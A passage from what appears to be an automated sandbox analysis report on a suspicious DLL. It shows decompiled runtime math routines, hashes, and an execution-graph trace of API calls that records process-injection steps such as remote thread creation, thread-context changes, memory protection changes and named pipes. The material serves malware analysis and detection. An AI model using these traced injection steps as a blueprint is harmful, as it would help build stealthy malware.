                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$cos
                • API String ID: 1757819995-1949035351
                • Opcode ID: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction ID: 6ccaaf37afb0d8076bee4401a86273a5ef969ac342ab9ffefb74f8d11d3310ef
                • Opcode Fuzzy Hash: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction Fuzzy Hash: 9401E1BAA28FC546DA04CF22980036E6162FBDA784F949334EA5D17BC8EB2CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F20F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E00007FFA7FFA535F20F8(long long _a8) {
				intOrPtr _v24;
				intOrPtr _v48;
				intOrPtr _v56;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t13;
				signed long long _t17;

				r8d = 0x12;
				goto 0x535f2120;
				asm("int3");
				asm("int3");
				r8d = 0x1e;
				goto 0x535f2120;
				asm("int3");
				asm("int3");
				asm("movsd [esp+0x60], xmm0");
				_t17 = _a8;
				r10d = r8d;
				asm("movaps xmm1, xmm0");
				if ((_t17 & 0x00000000) != 0) goto 0x535f21b7;
				if ((0xffffffff & _t17) != 0) goto 0x535f21a5;
				r9d = 1;
				_v24 = r9d;
				asm("xorps xmm0, xmm0");
				asm("movsd [esp+0x38], xmm0");
				asm("movsd [esp+0x30], xmm1");
				_v48 = 0x21;
				_v56 = 8;
				_a8 = 0;
				_t10 = E00007FFA7FFA535F0B44(_t9, _t11, _t13, 0xffffffff & _t17, 0x53671f04, 0, 0);
				goto 0x535f21b7;
				_a8 = 0xfff8000000000000;
				asm("movsd xmm0, [esp+0x60]");
				return _t10;
			}











                0x7ffa535f20f8
                0x7ffa535f2105
                0x7ffa535f210a
                0x7ffa535f210b
                0x7ffa535f210c
                0x7ffa535f2119
                0x7ffa535f211e
                0x7ffa535f211f
                0x7ffa535f2124
                0x7ffa535f212d
                0x7ffa535f213f
                0x7ffa535f2145
                0x7ffa535f214b
                0x7ffa535f215a
                0x7ffa535f2166
                0x7ffa535f216c
                0x7ffa535f2171
                0x7ffa535f2174
                0x7ffa535f217d
                0x7ffa535f2186
                0x7ffa535f2191
                0x7ffa535f2199
                0x7ffa535f219e
                0x7ffa535f21a3
                0x7ffa535f21b2
                0x7ffa535f21b7
                0x7ffa535f21c1

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$cos
                • API String ID: 3384550415-1949035351
                • Opcode ID: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction ID: b98486cbb7c7ad8c95903bcf641d360f1fde733240f316f09a453ba1c0808dd3
                • Opcode Fuzzy Hash: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction Fuzzy Hash: C501D2B6A28FC446DA10CF22A80037A6162FBDA7C4F509334EA4D17B88EF3CE151CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F210C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E00007FFA7FFA535F210C(long long _a8) {
				intOrPtr _v24;
				intOrPtr _v48;
				intOrPtr _v56;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t13;
				signed long long _t17;

				r8d = 0x1e;
				goto 0x535f2120;
				asm("int3");
				asm("int3");
				asm("movsd [esp+0x60], xmm0");
				_t17 = _a8;
				r10d = r8d;
				asm("movaps xmm1, xmm0");
				if ((_t17 & 0x00000000) != 0) goto 0x535f21b7;
				if ((0xffffffff & _t17) != 0) goto 0x535f21a5;
				r9d = 1;
				_v24 = r9d;
				asm("xorps xmm0, xmm0");
				asm("movsd [esp+0x38], xmm0");
				asm("movsd [esp+0x30], xmm1");
				_v48 = 0x21;
				_v56 = 8;
				_a8 = 0;
				_t10 = E00007FFA7FFA535F0B44(_t9, _t11, _t13, 0xffffffff & _t17, 0x53671f04, 0, 0);
				goto 0x535f21b7;
				_a8 = 0xfff8000000000000;
				asm("movsd xmm0, [esp+0x60]");
				return _t10;
			}











                0x7ffa535f210c
                0x7ffa535f2119
                0x7ffa535f211e
                0x7ffa535f211f
                0x7ffa535f2124
                0x7ffa535f212d
                0x7ffa535f213f
                0x7ffa535f2145
                0x7ffa535f214b
                0x7ffa535f215a
                0x7ffa535f2166
                0x7ffa535f216c
                0x7ffa535f2171
                0x7ffa535f2174
                0x7ffa535f217d
                0x7ffa535f2186
                0x7ffa535f2191
                0x7ffa535f2199
                0x7ffa535f219e
                0x7ffa535f21a3
                0x7ffa535f21b2
                0x7ffa535f21b7
                0x7ffa535f21c1

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$sin
                • API String ID: 3384550415-1565623160
                • Opcode ID: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction ID: 9f0fe626548f1c3974b523ed01bc2dc534fb9964156baa372bca17854b060a4e
                • Opcode Fuzzy Hash: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction Fuzzy Hash: 0D01F5B6A28FC445D610CF12980037A6162BFDB7C4F509324EA4D16B88EF7CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F3550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00007FFA7FFA535F3550(void* __eax, void* __eflags, void* __r8, signed int _a32) {
				intOrPtr _v40;
				intOrPtr _v64;
				intOrPtr _v72;
				void* _t12;
				void* _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				_t23 = __r8;
				_t19 = _t22;
				asm("movaps [eax-0x18], xmm6");
				asm("movaps xmm6, xmm1");
				asm("movaps xmm2, xmm0");
				r8d = r8d - 2;
				if (__eflags == 0) goto 0x535f3592;
				if (r8d != 1) goto 0x535f35ea;
				 *((intOrPtr*)(_t19 - 0x28)) = r8d;
				_t2 = _t23 + 2; // 0x200000001
				r9d = _t2;
				asm("xorps xmm1, xmm1");
				asm("movss [eax-0x30], xmm1");
				asm("movss [eax-0x38], xmm2");
				 *((intOrPtr*)(_t19 - 0x40)) = 0x22;
				 *((intOrPtr*)(_t19 - 0x48)) = 0x11;
				goto 0x535f35bf;
				_v40 = 1;
				asm("xorps xmm0, xmm0");
				asm("movss [esp+0x38], xmm0");
				r9d = 4;
				asm("movss [esp+0x30], xmm2");
				_v64 = 0x22;
				_v72 = 0x12;
				_t8 =  &_a32;
				_a32 = _a32 & 0x00000000;
				asm("movss [esp+0x88], xmm6");
				_t12 = E00007FFA7FFA535F0C6C(__eax, _t13, _t15,  *_t8, 0x53678540, _t21, _a32);
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x50]");
				return _t12;
			}













                0x7ffa535f3550
                0x7ffa535f3550
                0x7ffa535f3557
                0x7ffa535f355b
                0x7ffa535f355e
                0x7ffa535f3561
                0x7ffa535f3565
                0x7ffa535f356b
                0x7ffa535f356d
                0x7ffa535f3571
                0x7ffa535f3571
                0x7ffa535f3575
                0x7ffa535f3578
                0x7ffa535f357d
                0x7ffa535f3582
                0x7ffa535f3589
                0x7ffa535f3590
                0x7ffa535f3592
                0x7ffa535f359a
                0x7ffa535f359d
                0x7ffa535f35a3
                0x7ffa535f35a9
                0x7ffa535f35af
                0x7ffa535f35b7
                0x7ffa535f35bf
                0x7ffa535f35bf
                0x7ffa535f35cf
                0x7ffa535f35e5
                0x7ffa535f35ea
                0x7ffa535f35ed
                0x7ffa535f35f6

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: "$expf
                • API String ID: 2315412904-303238936
                • Opcode ID: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction ID: 3ca24db9f424951db9495ff09cb59ca0f26dd413ffadfcd395ce1a0a0d2c5c56
                • Opcode Fuzzy Hash: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction Fuzzy Hash: FD017372938BC486E331CB21D0893AAB761FBE6344F649315E348266A0CF7DD495DB00
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:3.4%
                Dynamic/Decrypted Code Coverage:0.1%
                Signature Coverage:19%
                Total number of Nodes:1204
                Total number of Limit Nodes:52
                execution_graph 62995 7ffa535e74c8 62996 7ffa535e74dc 62995->62996 62997 7ffa535e74e5 62995->62997 62996->62997 63001 7ffa535e7510 62996->63001 63002 7ffa535e7529 63001->63002 63003 7ffa535e74ee 63001->63003 63014 7ffa535eea94 63002->63014 63003->62997 63013 7ffa535e76bc 17 API calls 2 library calls 63003->63013 63008 7ffa535e753b 63032 7ffa535e7e58 15 API calls 2 library calls 63008->63032 63011 7ffa535e7548 63031 7ffa535e7e58 15 API calls 2 library calls 63011->63031 63013->62997 63015 7ffa535eeaa1 63014->63015 63017 7ffa535e752e 63014->63017 63033 7ffa535ee8dc 49 API calls 4 library calls 63015->63033 63018 7ffa535eee4c GetEnvironmentStringsW 63017->63018 63019 7ffa535eef1e 63018->63019 63020 7ffa535eee7a WideCharToMultiByte 63018->63020 63022 7ffa535eef28 FreeEnvironmentStringsW 63019->63022 63023 7ffa535e7533 63019->63023 63020->63019 63024 7ffa535eeed4 63020->63024 63022->63023 63023->63008 63030 7ffa535e757c 32 API calls 3 library calls 63023->63030 63034 7ffa535e7e98 63024->63034 63027 7ffa535eeee4 WideCharToMultiByte 63028 7ffa535eef0b 63027->63028 63041 7ffa535e7e58 15 API calls 2 library calls 63028->63041 63030->63011 63031->63008 63032->63003 63033->63017 63035 7ffa535e7ea7 __vcrt_getptd_noexit 63034->63035 63036 7ffa535e7ee3 63034->63036 63035->63036 63037 7ffa535e7eca RtlAllocateHeap 63035->63037 63042 7ffa535ef4e8 EnterCriticalSection LeaveCriticalSection __vcrt_getptd_noexit 63035->63042 63043 7ffa535e8380 15 API calls _get_daylight 63036->63043 63037->63035 63039 7ffa535e7ee1 63037->63039 63039->63027 63039->63028 63041->63019 63042->63035 63043->63039 63044 7ffa535e3288 63045 7ffa535e3291 __scrt_initialize_onexit_tables 63044->63045 63047 7ffa535e3295 __isa_available_init 63045->63047 63048 7ffa535e7350 63045->63048 63049 7ffa535e7384 63048->63049 63050 7ffa535e736e 63048->63050 63052 7ffa535eea94 49 API calls 63049->63052 63076 7ffa535e8380 15 API calls _get_daylight 63050->63076 63054 7ffa535e7389 GetModuleFileNameA 63052->63054 63053 7ffa535e7373 63077 7ffa535e8260 32 API calls _invalid_parameter_noinfo 63053->63077 63056 7ffa535e73b6 63054->63056 63078 7ffa535e7130 36 API calls 63056->63078 63057 7ffa535e737f 63057->63047 63059 7ffa535e73e0 63079 7ffa535e72ec 15 API calls 2 library calls 63059->63079 63061 7ffa535e73f6 63062 7ffa535e740f 63061->63062 63063 7ffa535e73fe 63061->63063 63081 7ffa535e7130 36 API calls 63062->63081 63080 7ffa535e8380 15 API calls _get_daylight 63063->63080 63066 7ffa535e7403 63085 7ffa535e7e58 15 API calls 2 library calls 63066->63085 63068 7ffa535e742b 63068->63066 63069 7ffa535e7474 63068->63069 63070 7ffa535e745b 63068->63070 63084 7ffa535e7e58 15 API calls 2 library calls 63069->63084 63082 7ffa535e7e58 15 API calls 2 library calls 63070->63082 63073 7ffa535e7464 63083 7ffa535e7e58 15 API calls 2 library calls 63073->63083 63075 7ffa535e7470 63075->63057 63076->63053 63077->63057 63078->63059 63079->63061 63080->63066 63081->63068 63082->63073 63083->63075 63084->63066 63085->63057 63086 215205f4e90 63093 215205f9b2c 63086->63093 63089 215205f4e9d 63102 215205fa260 63093->63102 63096 2152060bca4 63130 2152060c3c8 GetLastError 63096->63130 63099 215205f9b40 63154 215205fa1f4 63099->63154 63103 215205fa27f GetLastError 63102->63103 63104 215205f4e99 63102->63104 63118 215205f9ff0 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue try_get_function 63103->63118 63104->63089 63104->63096 63106 215205fa2fd SetLastError 63106->63104 63107 215205fa292 63107->63106 63108 215205fa2a2 63107->63108 63119 215205fa044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 63107->63119 63108->63106 63110 215205fa2b2 63110->63106 63120 21520607c38 63110->63120 63113 215205fa2d9 63116 215205fa2ea 63113->63116 63127 215205fa044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 63113->63127 63128 2152060a780 11 API calls 2 library calls 63116->63128 63118->63107 63119->63110 63121 21520607c49 __crtLCMapStringA new 63120->63121 63122 21520607c9a 63121->63122 63123 21520607c7e HeapAlloc 63121->63123 63129 21520603944 11 API calls _Wcrtomb 63122->63129 63123->63121 63124 215205fa2c3 63123->63124 63124->63113 63126 215205fa044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 63124->63126 63126->63113 63127->63116 63128->63106 63129->63124 63131 2152060c3f1 63130->63131 63132 2152060c3ec 63130->63132 63134 21520607c38 __vcrt_getptd_noexit 8 API calls 63131->63134 63136 2152060c43a 63131->63136 63149 2152060c9f4 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue __crtLCMapStringW 63132->63149 63135 2152060c408 63134->63135 63137 2152060c410 63135->63137 63151 2152060ca4c LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue __crtLCMapStringW 63135->63151 63139 2152060c449 SetLastError 63136->63139 63140 2152060c43f SetLastError 63136->63140 63150 2152060a780 11 API calls 2 library calls 63137->63150 63143 215205f4ea6 63139->63143 63140->63143 63142 2152060c427 63142->63137 63145 2152060c42e 63142->63145 63143->63089 63143->63099 63144 2152060c417 63144->63140 63152 2152060c0a0 11 API calls _Wcrtomb 63145->63152 63147 2152060c433 63153 2152060a780 11 API calls 2 library calls 63147->63153 63149->63131 63150->63144 63151->63142 63152->63147 63153->63136 63155 215205f9b4b 63154->63155 63156 215205fa208 63154->63156 63155->63089 63157 215205fa212 63156->63157 63162 215205f9ff0 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue try_get_function 63156->63162 63163 215205fa044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 63157->63163 63160 215205fa222 63160->63155 63164 2152060a780 11 API calls 2 library calls 63160->63164 63162->63157 63163->63160 63164->63155 63165 215205f582c 63166 215205f5852 63165->63166 63167 215205f5889 63166->63167 63168 215205f5869 dllmain_raw 63166->63168 63170 215205f585a 63166->63170 63167->63170 63216 2152058c180 63167->63216 63169 215205f587c 63168->63169 63168->63170 63182 215205f562c 63169->63182 63173 215205f58a0 63174 215205f58d6 63173->63174 63175 2152058c180 23 API calls 63173->63175 63174->63170 63176 215205f562c 51 API calls 63174->63176 63177 215205f58bc 63175->63177 63178 215205f58ec 63176->63178 63179 215205f562c 51 API calls 63177->63179 63178->63170 63180 215205f58f6 dllmain_raw 63178->63180 63181 215205f58c9 dllmain_raw 63179->63181 63180->63170 63181->63174 63183 215205f5634 63182->63183 63191 215205f566d __scrt_acquire_startup_lock 63182->63191 63184 215205f5661 63183->63184 63185 215205f5639 63183->63185 63234 215205f4f78 63184->63234 63186 215205f5654 __scrt_dllmain_crt_thread_attach 63185->63186 63187 215205f563e 63185->63187 63190 215205f5652 63186->63190 63189 215205f5643 63187->63189 63229 215205f4eb8 63187->63229 63188 215205f57c6 63188->63167 63189->63167 63190->63167 63191->63188 63194 215205f57f1 63191->63194 63250 215205f5dd8 IsProcessorFeaturePresent 63191->63250 63257 215205f4f34 63194->63257 63197 215205f57f6 63262 215205f4f64 8 API calls __vcrt_uninitialize_ptd 63197->63262 63198 215205f569e __scrt_acquire_startup_lock 63200 215205f56ca 63198->63200 63202 215205f5dd8 __scrt_fastfail 5 API calls 63198->63202 63210 215205f56a2 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 63198->63210 63242 215205f4e78 63200->63242 63201 215205f5801 __scrt_release_startup_lock 63263 215205f5150 4 API calls 2 library calls 63201->63263 63202->63200 63205 215205f56d9 _RTC_Initialize 63205->63210 63245 215205f51cc 63205->63245 63209 215205f56f3 63211 215205f51cc __scrt_initialize_thread_safe_statics 13 API calls 63209->63211 63210->63167 63212 215205f56ff 63211->63212 63212->63210 63213 215205f571b __scrt_dllmain_after_initialize_c 63212->63213 63213->63210 63214 215205f5724 63213->63214 63215 2152060bcec 28 API calls 63214->63215 63215->63210 63217 2152058c193 63216->63217 63218 2152058c2e8 63216->63218 63219 2152058c1e2 63217->63219 63220 2152058c1ba VirtualAlloc 63217->63220 63218->63173 63354 215205ca748 GetModuleHandleA 63219->63354 63220->63219 63223 2152058c218 try_get_function 63224 2152058c22b GetCurrentProcess NtCreateThreadEx 63223->63224 63224->63218 63225 2152058c292 GetThreadContext 63224->63225 63226 2152058c2b6 SetThreadContext 63225->63226 63227 2152058c2ac 63225->63227 63226->63227 63228 2152058c2db ResumeThread 63226->63228 63227->63173 63228->63218 63264 2152060bcb8 63229->63264 63232 215205f9b40 16 API calls 63233 215205f4ec6 63232->63233 63233->63190 63235 215205f4f9a 63234->63235 63281 215205f9af8 63235->63281 63237 215205f4f9f 63240 215205f4fa3 63237->63240 63287 2152060bc90 63237->63287 63239 215205f4fac 63239->63240 63291 215205f9b54 4 API calls 3 library calls 63239->63291 63240->63198 63337 215205f4fc4 63242->63337 63244 215205f4e83 63244->63205 63342 215205f517c 63245->63342 63247 215205f51d5 63248 215205f5fcc InitializeSListHead 63247->63248 63249 21520627458 63248->63249 63251 215205f5dfd __ExceptionPtr::__ExceptionPtr 63250->63251 63252 215205f5e19 RtlCaptureContext RtlLookupFunctionEntry 63251->63252 63253 215205f5e42 RtlVirtualUnwind 63252->63253 63254 215205f5e7e __ExceptionPtr::__ExceptionPtr 63252->63254 63253->63254 63255 215205f5eb0 IsDebuggerPresent 63254->63255 63256 215205f5ef3 __scrt_fastfail 63255->63256 63256->63194 63258 215205f4f3d __scrt_initialize_onexit_tables 63257->63258 63261 215205f4f51 63258->63261 63347 2152060b70c 63258->63347 63260 2152060bacd 63260->63197 63261->63197 63262->63201 63263->63188 63267 2152060c2f0 63264->63267 63268 215205f4ec1 63267->63268 63269 2152060c301 63267->63269 63268->63232 63277 2152060c9f4 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue __crtLCMapStringW 63269->63277 63271 2152060c306 63271->63268 63278 2152060ca4c LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue __crtLCMapStringW 63271->63278 63273 2152060c31b 63279 2152060c190 11 API calls 2 library calls 63273->63279 63275 2152060c323 63280 2152060a780 11 API calls 2 library calls 63275->63280 63277->63271 63278->63273 63279->63275 63280->63268 63282 215205f9b01 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 63281->63282 63292 215205fa554 63282->63292 63284 215205f9b0b 63285 215205f9b0f __vcrt_uninitialize_locks 63284->63285 63296 215205fa318 6 API calls 3 library calls 63284->63296 63285->63237 63289 21520614eac 63287->63289 63288 21520614ecb 63288->63239 63289->63288 63308 2152060e3a0 63289->63308 63291->63240 63293 215205fa55c 63292->63293 63295 215205fa589 __vcrt_uninitialize_locks 63293->63295 63297 215205fa0ac 63293->63297 63295->63284 63296->63285 63302 215205f9d80 63297->63302 63299 215205fa0e7 63300 215205fa103 InitializeCriticalSectionAndSpinCount 63299->63300 63301 215205fa0ef 63299->63301 63300->63301 63301->63293 63303 215205f9de6 try_get_function 63302->63303 63306 215205f9de1 __vcrt_uninitialize_winapi_thunks 63302->63306 63303->63299 63304 215205f9e19 LoadLibraryExW 63305 215205f9e3f GetLastError 63304->63305 63304->63306 63305->63306 63307 215205f9e4a LoadLibraryExW 63305->63307 63306->63303 63306->63304 63307->63306 63309 2152060e3b0 abort 63308->63309 63316 215206169c8 63309->63316 63311 2152060e3b9 63313 2152060e3c7 abort 63311->63313 63324 2152060e1b8 14 API calls 63311->63324 63313->63289 63314 2152060e3c2 63325 2152060e2a4 GetStdHandle GetFileType 63314->63325 63317 215206169f0 63316->63317 63323 21520616a05 abort 63316->63323 63333 21520603944 11 API calls _Wcrtomb 63317->63333 63319 215206169f5 63334 215205faabc 11 API calls _invalid_parameter_noinfo 63319->63334 63321 21520616a01 abort 63321->63311 63323->63321 63326 215206168e0 63323->63326 63324->63314 63325->63313 63327 21520607c38 __vcrt_getptd_noexit 11 API calls 63326->63327 63331 21520616900 63327->63331 63328 21520616953 63336 2152060a780 11 API calls 2 library calls 63328->63336 63330 2152061695d 63330->63323 63331->63328 63335 2152060cda0 LoadLibraryExW GetLastError LoadLibraryExW InitializeCriticalSectionAndSpinCount __crtLCMapStringW 63331->63335 63333->63319 63334->63321 63335->63331 63336->63330 63338 215205f5082 63337->63338 63341 215205f4fdc __scrt_initialize_onexit_tables 63337->63341 63339 215205f5dd8 __scrt_fastfail 5 API calls 63338->63339 63340 215205f508c 63339->63340 63341->63244 63343 215205f51ab 63342->63343 63344 215205f51a1 _onexit 63342->63344 63346 2152060bb14 13 API calls _onexit 63343->63346 63344->63247 63346->63344 63351 2152060b735 abort 63347->63351 63348 2152060b741 abort 63348->63260 63349 2152060b7c4 63349->63348 63353 2152060a780 11 API calls 2 library calls 63349->63353 63351->63348 63351->63349 63352 2152060b825 TlsFree 63351->63352 63352->63351 63353->63348 63355 2152058c1f1 GetModuleHandleW 63354->63355 63356 215205ca775 63354->63356 63355->63223 63360 215205cb35c 63356->63360 63361 215205ca78b 63360->63361 63362 215205cb39b 63360->63362 63361->63355 63368 215205ca568 63361->63368 63362->63361 63363 215205cb4d0 63362->63363 63364 215205cb48a lstrcmpA 63362->63364 63363->63361 63365 215205cb4ec 63363->63365 63364->63362 63364->63363 63378 215205cb298 9 API calls 2 library calls 63365->63378 63367 215205cb4f7 63367->63361 63371 215205ca594 63368->63371 63370 215205ca61f 63370->63355 63372 215205ca5fa 63371->63372 63379 215205ca884 63371->63379 63372->63370 63387 215205cb0d8 63372->63387 63374 215205ca686 VirtualProtectEx 63374->63370 63376 215205ca6e8 VirtualProtectEx 63374->63376 63376->63370 63378->63367 63381 215205ca8b2 63379->63381 63380 215205ca8d1 VirtualQuery 63380->63381 63381->63380 63382 215205ca8f4 VirtualAlloc 63381->63382 63385 215205ca92e 63381->63385 63382->63381 63384 215205ca9aa 63382->63384 63383 215205ca954 VirtualQuery 63383->63385 63384->63372 63385->63383 63385->63384 63386 215205ca977 VirtualAlloc 63385->63386 63386->63384 63386->63385 63390 215205cb10a 63387->63390 63389 215205ca650 63389->63370 63389->63374 63391 215205f59d0 63390->63391 63392 215205f59da 63391->63392 63393 215205f59e6 63392->63393 63394 215205f60d8 IsProcessorFeaturePresent 63392->63394 63393->63389 63395 215205f60ef 63394->63395 63398 215205f62cc RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 63395->63398 63397 215205f6102 63397->63389 63398->63397 63399 7ffa535faf20 63402 7ffa535e1488 GetProcessHeap HeapAlloc 63399->63402 63403 7ffa535e14cf __scrt_fastfail 63402->63403 63404 7ffa535e1a2a 63403->63404 63407 7ffa535e19a8 CloseHandle 63403->63407 63408 7ffa535e15be 63403->63408 63405 7ffa535e1aae 63404->63405 63406 7ffa535e1a3a 63404->63406 63410 7ffa535e1c64 63405->63410 63413 7ffa535e1ae7 LeaveCriticalSection 63405->63413 63414 7ffa535e1c13 DisconnectNamedPipe 63405->63414 63448 7ffa535f8f2c GetModuleFileNameA SetFileAttributesA FindFirstFileA CreateNamedPipeA 63406->63448 63407->63404 63421 7ffa535f6898 63408->63421 63415 7ffa535e1cee ExitProcess 63410->63415 63412 7ffa535e1aa2 63412->63415 63413->63410 63414->63410 63416 7ffa535e170e 63429 7ffa535f6e94 63416->63429 63420 7ffa535e1931 LoadLibraryA 63420->63404 63422 7ffa535f696e 63421->63422 63423 7ffa535f6ad9 63421->63423 63428 7ffa535f6abc 63422->63428 63449 7ffa535f7a40 63422->63449 63423->63422 63424 7ffa535f6b74 EnterCriticalSection GetLastError 63423->63424 63424->63422 63424->63424 63428->63416 63430 7ffa535f7553 63429->63430 63432 7ffa535f6f96 63429->63432 63431 7ffa535e17c9 63430->63431 63433 7ffa535f763a GetCurrentThreadId 63430->63433 63435 7ffa535f76c3 63430->63435 63439 7ffa535f84f0 63431->63439 63434 7ffa535f73f6 63432->63434 63433->63435 63489 7ffa535f9404 FindFirstFileA CreateNamedPipeA 63434->63489 63435->63431 63437 7ffa535f7738 GetCurrentActCtx 63435->63437 63437->63435 63438 7ffa535f74c4 63438->63430 63440 7ffa535f85bb 63439->63440 63445 7ffa535f8881 63439->63445 63441 7ffa535f85d4 63440->63441 63442 7ffa535f88c3 63440->63442 63440->63445 63441->63445 63490 7ffa535e1000 VirtualProtect 63441->63490 63443 7ffa535f89ad EnterCriticalSection 63442->63443 63442->63445 63444 7ffa535f6e94 4 API calls 63443->63444 63446 7ffa535f8b06 LeaveCriticalSection 63444->63446 63445->63420 63445->63445 63446->63445 63448->63412 63450 7ffa535f7ad3 63449->63450 63457 7ffa535f8158 63449->63457 63480 7ffa535f8c00 63450->63480 63451 7ffa535f6a59 63460 7ffa535f9c34 63451->63460 63453 7ffa535f841a ConnectNamedPipe 63453->63451 63454 7ffa535f81a3 InitializeCriticalSection 63455 7ffa535f6e94 4 API calls 63454->63455 63455->63457 63457->63451 63457->63453 63457->63454 63458 7ffa535f8416 63457->63458 63458->63453 63461 7ffa535fa66f 63460->63461 63463 7ffa535f9cfe 63460->63463 63462 7ffa535fa686 GetLastError FindFirstFileA ConnectNamedPipe CreateFileA 63461->63462 63479 7ffa535fa48b 63461->63479 63462->63479 63464 7ffa535e229c 2 API calls 63463->63464 63463->63479 63465 7ffa535fa019 63464->63465 63466 7ffa535e229c 2 API calls 63465->63466 63467 7ffa535fa1ba 63466->63467 63468 7ffa535e229c 2 API calls 63467->63468 63469 7ffa535fa216 63468->63469 63470 7ffa535e229c 2 API calls 63469->63470 63471 7ffa535fa248 63470->63471 63472 7ffa535e229c 2 API calls 63471->63472 63473 7ffa535fa2b0 63472->63473 63474 7ffa535e229c 2 API calls 63473->63474 63475 7ffa535fa356 63474->63475 63476 7ffa535fa60b ExitProcess 63475->63476 63477 7ffa535fa3be 63475->63477 63488 7ffa535e27d4 ExitProcess 63477->63488 63479->63428 63481 7ffa535f8c8a 63480->63481 63483 7ffa535f7b30 63480->63483 63482 7ffa535f8d28 FindNextFileA InitializeCriticalSection 63481->63482 63481->63483 63482->63483 63484 7ffa535e229c 63483->63484 63485 